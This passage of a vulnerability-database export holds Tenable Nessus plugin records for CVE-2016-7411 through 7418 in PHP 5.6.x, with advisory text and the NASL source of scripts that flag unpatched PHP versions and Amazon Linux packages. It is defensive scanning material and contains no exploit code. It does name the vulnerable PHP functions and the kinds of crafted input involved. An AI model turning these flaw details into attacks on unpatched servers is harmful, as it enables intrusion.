via a specially crafted wddxPacket XML document, to cause a denial of service condition. (CVE-2016-7418)\n\n - An out-of-bounds access error exists in the phar_parse_tarfile() function within file ext/phar/tar.c when handling the verification of signatures. An unauthenticated, remote attacker can exploit this to cause an unspecified impact.\n\n - An integer overflow condition exists in the fgetcsv() function when handling CSV field lengths due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of arbitrary code.\n\n - An integer overflow condition exists in the wordwrap() function within file ext/standard/string.c due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of arbitrary code.\n\n - An integer overflow condition exists in the fgets() function within file ext/standard/file.c due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of arbitrary code.\n\n - An integer overflow condition exists in the xml_utf8_encode() function within file ext/xml/xml.c due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to cause an unspecified impact.\n\n - A flaw exists in the exif_process_IFD_in_TIFF() function within file ext/exif/exif.c when handling uninitialized thumbnail data. An unauthenticated, remote attacker can exploit this to disclose memory contents.", "cvss3": {}, "published": "2016-09-22T00:00:00", "type": "nessus", "title": "PHP 5.6.x < 5.6.26 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_6_26.NASL", "href": "https://www.tenable.com/plugins/nessus/93656", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93656);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2016-7411\",\n \"CVE-2016-7412\",\n \"CVE-2016-7413\",\n \"CVE-2016-7414\",\n \"CVE-2016-7416\",\n \"CVE-2016-7417\",\n \"CVE-2016-7418\"\n );\n script_bugtraq_id(\n 93004,\n 93005,\n 93006,\n 93007,\n 93008,\n 93009,\n 93011\n );\n\n script_name(english:\"PHP 5.6.x < 5.6.26 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of PHP running on the remote web server is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote web\nserver is 5.6.x prior to 5.6.26. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A flaw exists in ext/standard/var_unserializer.re when\n destroying deserialized objects due to improper\n validation of user-supplied input. An unauthenticated,\n remote attacker can exploit this, via a deserialize\n call that references a partially constructed object, to\n corrupt memory, resulting in a denial of service\n condition. (CVE-2016-7411)\n\n - An heap buffer overflow condition exists in the\n php_mysqlnd_rowp_read_text_protocol_aux() function\n within file ext/mysqlnd/mysqlnd_wireprotocol.c due to\n a failure to verify that a BIT field has the\n UNSIGNED_FLAG flag. An unauthenticated, remote attacker\n can exploit this, via specially crafted field metadata,\n to cause a denial of service condition. (CVE-2016-7412)\n\n - A use-after-free error exists in the\n wddx_stack_destroy() function within file\n ext/wddx/wddx.c when deserializing recordset elements.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted wddxPacket XML document, to\n cause a denial of service condition. (CVE-2016-7413)\n\n - An out-of-bounds access error exists in the\n phar_parse_zipfile() function within file ext/phar/zip.c\n due to a failure to ensure that the\n uncompressed_filesize field is large enough. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted archive, to cause a denial of service\n condition. (CVE-2016-7414)\n\n - A stack-based buffer overflow condition exists in the\n ICU4C library, specifically within file common/locid.cpp\n in the msgfmt_format_message() function, due to a\n failure to properly restrict the locale length provided\n to the Locale class. An unauthenticated, remote attacker\n can exploit this, via a long first argument to a\n MessageFormatter::formatMessage() function call, to\n cause a denial of service condition. (CVE-2016-7416)\n\n - A flaw exists in the spl_array_get_dimension_ptr_ptr()\n function within file ext/spl/spl_array.c due to a\n failure to properly validate the return value and data\n type when deserializing SplArray. An unauthenticated,\n remote attacker can exploit this, via specially crafted\n serialized data, to cause a denial of service condition.\n (CVE-2016-7417)\n\n - An out-of-bounds read error exists in the\n php_wddx_push_element() function within file\n ext/wddx/wddx.c when handling an incorrect boolean\n element, which leads to mishandling the\n wddx_deserialize() call. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n wddxPacket XML document, to cause a denial of service\n condition. (CVE-2016-7418)\n\n - An out-of-bounds access error exists in the\n phar_parse_tarfile() function within file ext/phar/tar.c\n when handling the verification of signatures. An\n unauthenticated, remote attacker can exploit this to\n cause an unspecified impact.\n\n - An integer overflow condition exists in the fgetcsv()\n function when handling CSV field lengths due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this to corrupt memory, resulting\n in a denial of service condition or the execution of\n arbitrary code.\n\n - An integer overflow condition exists in the wordwrap()\n function within file ext/standard/string.c due to\n improper validation of certain input. An\n unauthenticated, remote attacker can exploit this to\n corrupt memory, resulting in a denial of service\n condition or the execution of arbitrary code.\n\n - An integer overflow condition exists in the fgets()\n function within file ext/standard/file.c due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this to corrupt memory, resulting\n in a denial of service condition or the execution of\n arbitrary code.\n\n - An integer overflow condition exists in the\n xml_utf8_encode() function within file ext/xml/xml.c due\n to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this to\n cause an unspecified impact.\n\n - A flaw exists in the exif_process_IFD_in_TIFF() function\n within file ext/exif/exif.c when handling uninitialized\n thumbnail data. An unauthenticated, remote attacker can\n exploit this to disclose memory contents.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://secure.php.net/ChangeLog-5.php#5.6.26\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.6.26 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-7411\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.6)?$\")\n audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.6\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.6.x\", port);\n\nif (version =~ \"^5\\.6\\.\" && ver_compare(ver:version, fix:\"5.6.26\", strict:FALSE) < 0){\n security_report_v4(\n port : port,\n extra :\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 5.6.26' +\n '\\n',\n severity:SECURITY_HOLE\n );\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:28:42", "description": "ext/standard/var_unserializer.re in PHP before 5.6.26 mishandles object-deserialization failures, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via an unserialize call that references a partially constructed object (CVE-2016-7411).\n\next/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26 and 7.x before 7.0.11 does not verify that a BIT field has the UNSIGNED_FLAG flag, which allows remote MySQL servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact via crafted field metadata (CVE-2016-7412).\n\nUse-after-free vulnerability in the wddx_stack_destroy function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a wddxPacket XML document that lacks an end-tag for a recordset field element, leading to mishandling in a wddx_deserialize call (CVE-2016-7413).\n\nThe ZIP signature-verification feature in PHP before 5.6.26 and 7.x before 7.0.11 does not ensure that the uncompressed_filesize field is large enough, which allows remote attackers to cause a denial of service (out-of-bounds memory access) or possibly have unspecified other impact via a crafted PHAR archive, related to ext/phar/util.c and ext/phar/zip.c (CVE-2016-7414).\n\next/intl/msgformat/msgformat_format.c in PHP before 5.6.26 and 7.x before 7.0.11 does not properly restrict the locale length provided to the Locale class in the ICU library, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a MessageFormatter::formatMessage call with a long first argument (CVE-2016-7416).\n\next/spl/spl_array.c in PHP before 5.6.26 and 7.x before 7.0.11 proceeds with SplArray unserialization without validating a return value and data type, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data (CVE-2016-7417).\n\nThe php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service (invalid pointer access and out-of-bounds read) or possibly have unspecified other impact via an incorrect boolean element in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call (CVE-2016-7418).", "cvss3": {}, "published": "2016-10-13T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : php56 (ALAS-2016-753)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:php56", "p-cpe:/a:amazon:linux:php56-bcmath", "p-cpe:/a:amazon:linux:php56-cli", "p-cpe:/a:amazon:linux:php56-common", "p-cpe:/a:amazon:linux:php56-dba", "p-cpe:/a:amazon:linux:php56-dbg", "p-cpe:/a:amazon:linux:php56-debuginfo", "p-cpe:/a:amazon:linux:php56-devel", "p-cpe:/a:amazon:linux:php56-embedded", "p-cpe:/a:amazon:linux:php56-enchant", "p-cpe:/a:amazon:linux:php56-fpm", "p-cpe:/a:amazon:linux:php56-gd", "p-cpe:/a:amazon:linux:php56-gmp", "p-cpe:/a:amazon:linux:php56-imap", "p-cpe:/a:amazon:linux:php56-intl", "p-cpe:/a:amazon:linux:php56-ldap", "p-cpe:/a:amazon:linux:php56-mbstring", "p-cpe:/a:amazon:linux:php56-mcrypt", "p-cpe:/a:amazon:linux:php56-mssql", "p-cpe:/a:amazon:linux:php56-mysqlnd", "p-cpe:/a:amazon:linux:php56-odbc", "p-cpe:/a:amazon:linux:php56-opcache", "p-cpe:/a:amazon:linux:php56-pdo", "p-cpe:/a:amazon:linux:php56-pgsql", "p-cpe:/a:amazon:linux:php56-process", "p-cpe:/a:amazon:linux:php56-pspell", "p-cpe:/a:amazon:linux:php56-recode", "p-cpe:/a:amazon:linux:php56-snmp", "p-cpe:/a:amazon:linux:php56-soap", "p-cpe:/a:amazon:linux:php56-tidy", "p-cpe:/a:amazon:linux:php56-xml", "p-cpe:/a:amazon:linux:php56-xmlrpc", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-753.NASL", "href": "https://www.tenable.com/plugins/nessus/94019", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-753.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94019);\n script_version(\"2.4\");\n script_cvs_date(\"Date: 2018/04/18 15:09:36\");\n\n script_cve_id(\"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7413\", \"CVE-2016-7414\", \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7418\");\n script_xref(name:\"ALAS\", value:\"2016-753\");\n\n script_name(english:\"Amazon Linux AMI : php56 (ALAS-2016-753)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"ext/standard/var_unserializer.re in PHP before 5.6.26 mishandles\nobject-deserialization failures, which allows remote attackers to\ncause a denial of service (memory corruption) or possibly have\nunspecified other impact via an unserialize call that references a\npartially constructed object (CVE-2016-7411).\n\next/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26 and 7.x before\n7.0.11 does not verify that a BIT field has the UNSIGNED_FLAG flag,\nwhich allows remote MySQL servers to cause a denial of service\n(heap-based buffer overflow) or possibly have unspecified other impact\nvia crafted field metadata (CVE-2016-7412).\n\nUse-after-free vulnerability in the wddx_stack_destroy function in\next/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows\nremote attackers to cause a denial of service or possibly have\nunspecified other impact via a wddxPacket XML document that lacks an\nend-tag for a recordset field element, leading to mishandling in a\nwddx_deserialize call (CVE-2016-7413).\n\nThe ZIP signature-verification feature in PHP before 5.6.26 and 7.x\nbefore 7.0.11 does not ensure that the uncompressed_filesize field is\nlarge enough, which allows remote attackers to cause a denial of\nservice (out-of-bounds memory access) or possibly have unspecified\nother impact via a crafted PHAR archive, related to ext/phar/util.c\nand ext/phar/zip.c (CVE-2016-7414).\n\next/intl/msgformat/msgformat_format.c in PHP before 5.6.26 and 7.x\nbefore 7.0.11 does not properly restrict the locale length provided to\nthe Locale class in the ICU library, which allows remote attackers to\ncause a denial of service (application crash) or possibly have\nunspecified other impact via a MessageFormatter::formatMessage call\nwith a long first argument (CVE-2016-7416).\n\next/spl/spl_array.c in PHP before 5.6.26 and 7.x before 7.0.11\nproceeds with SplArray unserialization without validating a return\nvalue and data type, which allows remote attackers to cause a denial\nof service or possibly have unspecified other impact via crafted\nserialized data (CVE-2016-7417).\n\nThe php_wddx_push_element function in ext/wddx/wddx.c in PHP before\n5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial\nof service (invalid pointer access and out-of-bounds read) or possibly\nhave unspecified other impact via an incorrect boolean element in a\nwddxPacket XML document, leading to mishandling in a wddx_deserialize\ncall (CVE-2016-7418).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-753.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php56' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php56-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php56-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-bcmath-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-cli-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-common-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-dba-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-dbg-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-debuginfo-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-devel-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-embedded-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-enchant-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-fpm-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-gd-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-gmp-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-imap-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-intl-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-ldap-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-mbstring-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-mcrypt-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-mssql-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-mysqlnd-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-odbc-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-opcache-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-pdo-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-pgsql-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-process-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-pspell-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-recode-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-snmp-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-soap-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-tidy-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-xml-5.6.26-1.128.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php56-xmlrpc-5.6.26-1.128.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php56 / php56-bcmath / php56-cli / php56-common / php56-dba / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:08", "description": "This update for php5 fixes the following security issues :\n\n - CVE-2016-7411: php5: Memory corruption when destructing deserialized object\n\n - CVE-2016-7412: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG in BIT field\n\n - CVE-2016-7413: Use after free in wddx_deserialize\n\n - CVE-2016-7414: Out of bounds heap read when verifying signature of zip phar in phar_parse_zipfile\n\n - CVE-2016-7416: Stack based buffer overflow in msgfmt_format_message\n\n - CVE-2016-7417: Missing type check when unserializing SplArray\n\n - CVE-2016-7418: NULL pointer dereference in php_wddx_push_element\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-01-02T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : php5 (SUSE-SU-2016:2477-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:apache2-mod_php5", "p-cpe:/a:novell:suse_linux:apache2-mod_php5-debuginfo", "p-cpe:/a:novell:suse_linux:php5", "p-cpe:/a:novell:suse_linux:php5-bcmath", "p-cpe:/a:novell:suse_linux:php5-bcmath-debuginfo", "p-cpe:/a:novell:suse_linux:php5-bz2", "p-cpe:/a:novell:suse_linux:php5-bz2-debuginfo", "p-cpe:/a:novell:suse_linux:php5-calendar", "p-cpe:/a:novell:suse_linux:php5-calendar-debuginfo", "p-cpe:/a:novell:suse_linux:php5-ctype", "p-cpe:/a:novell:suse_linux:php5-ctype-debuginfo", "p-cpe:/a:novell:suse_linux:php5-curl", "p-cpe:/a:novell:suse_linux:php5-curl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-dba", "p-cpe:/a:novell:suse_linux:php5-dba-debuginfo", "p-cpe:/a:novell:suse_linux:php5-debuginfo", "p-cpe:/a:novell:suse_linux:php5-debugsource", "p-cpe:/a:novell:suse_linux:php5-dom", "p-cpe:/a:novell:suse_linux:php5-dom-debuginfo", "p-cpe:/a:novell:suse_linux:php5-enchant", "p-cpe:/a:novell:suse_linux:php5-enchant-debuginfo", "p-cpe:/a:novell:suse_linux:php5-exif", "p-cpe:/a:novell:suse_linux:php5-exif-debuginfo", "p-cpe:/a:novell:suse_linux:php5-fastcgi", "p-cpe:/a:novell:suse_linux:php5-fastcgi-debuginfo", "p-cpe:/a:novell:suse_linux:php5-fileinfo", "p-cpe:/a:novell:suse_linux:php5-fileinfo-debuginfo", "p-cpe:/a:novell:suse_linux:php5-fpm", "p-cpe:/a:novell:suse_linux:php5-fpm-debuginfo", "p-cpe:/a:novell:suse_linux:php5-ftp", "p-cpe:/a:novell:suse_linux:php5-ftp-debuginfo", "p-cpe:/a:novell:suse_linux:php5-gd", "p-cpe:/a:novell:suse_linux:php5-gd-debuginfo", "p-cpe:/a:novell:suse_linux:php5-gettext", "p-cpe:/a:novell:suse_linux:php5-gettext-debuginfo", "p-cpe:/a:novell:suse_linux:php5-gmp", "p-cpe:/a:novell:suse_linux:php5-gmp-debuginfo", "p-cpe:/a:novell:suse_linux:php5-iconv", "p-cpe:/a:novell:suse_linux:php5-iconv-debuginfo", "p-cpe:/a:novell:suse_linux:php5-imap", "p-cpe:/a:novell:suse_linux:php5-imap-debuginfo", "p-cpe:/a:novell:suse_linux:php5-intl", "p-cpe:/a:novell:suse_linux:php5-intl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-json", "p-cpe:/a:novell:suse_linux:php5-json-debuginfo", "p-cpe:/a:novell:suse_linux:php5-ldap", "p-cpe:/a:novell:suse_linux:php5-ldap-debuginfo", "p-cpe:/a:novell:suse_linux:php5-mbstring", "p-cpe:/a:novell:suse_linux:php5-mbstring-debuginfo", "p-cpe:/a:novell:suse_linux:php5-mcrypt", "p-cpe:/a:novell:suse_linux:php5-mcrypt-debuginfo", "p-cpe:/a:novell:suse_linux:php5-mysql", "p-cpe:/a:novell:suse_linux:php5-mysql-debuginfo", "p-cpe:/a:novell:suse_linux:php5-odbc", "p-cpe:/a:novell:suse_linux:php5-odbc-debuginfo", "p-cpe:/a:novell:suse_linux:php5-opcache", "p-cpe:/a:novell:suse_linux:php5-opcache-debuginfo", "p-cpe:/a:novell:suse_linux:php5-openssl", "p-cpe:/a:novell:suse_linux:php5-openssl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-pcntl", "p-cpe:/a:novell:suse_linux:php5-pcntl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-pdo", "p-cpe:/a:novell:suse_linux:php5-pdo-debuginfo", "p-cpe:/a:novell:suse_linux:php5-pgsql", "p-cpe:/a:novell:suse_linux:php5-pgsql-debuginfo", "p-cpe:/a:novell:suse_linux:php5-phar", "p-cpe:/a:novell:suse_linux:php5-phar-debuginfo", "p-cpe:/a:novell:suse_linux:php5-posix", "p-cpe:/a:novell:suse_linux:php5-posix-debuginfo", "p-cpe:/a:novell:suse_linux:php5-pspell", "p-cpe:/a:novell:suse_linux:php5-pspell-debuginfo", "p-cpe:/a:novell:suse_linux:php5-shmop", "p-cpe:/a:novell:suse_linux:php5-shmop-debuginfo", "p-cpe:/a:novell:suse_linux:php5-snmp", 